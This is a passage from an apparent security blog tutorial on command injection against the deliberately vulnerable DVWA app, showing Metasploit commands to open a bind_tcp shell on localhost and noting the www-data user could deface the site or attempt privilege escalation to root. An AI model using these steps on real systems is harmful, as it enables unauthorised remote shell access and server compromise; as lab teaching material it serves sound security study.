penguintech01/penguintech01.github.io/_posts/2017-04-18-command-injection.md

 Let's start metasploit and open the shell on the server:

 <pre><code data-trim class="bash">
 ⁠⁠⁠msfconsole
 use exploit/multi/handler
 set payload linux/x64/shell
 set payload linux/x64/shell/bind_tcp
 set RHOST 127.0.0.1
 </code></pre>

 ![ci-4](/img/posts/ci/ci-4.png)

 Note that we didn't set the LPORT of bind_tcp, since the default one is 4444.

+As you notice we are the www-data user, and that's why we can't read the /etc/shadow file.
+But we have all the privileges that www-data user has, and that's enough for defacing DVWA, or exploiting a local privilege escalation vulnerability on the server in order to get root priviledges.

 Happy TCP binding!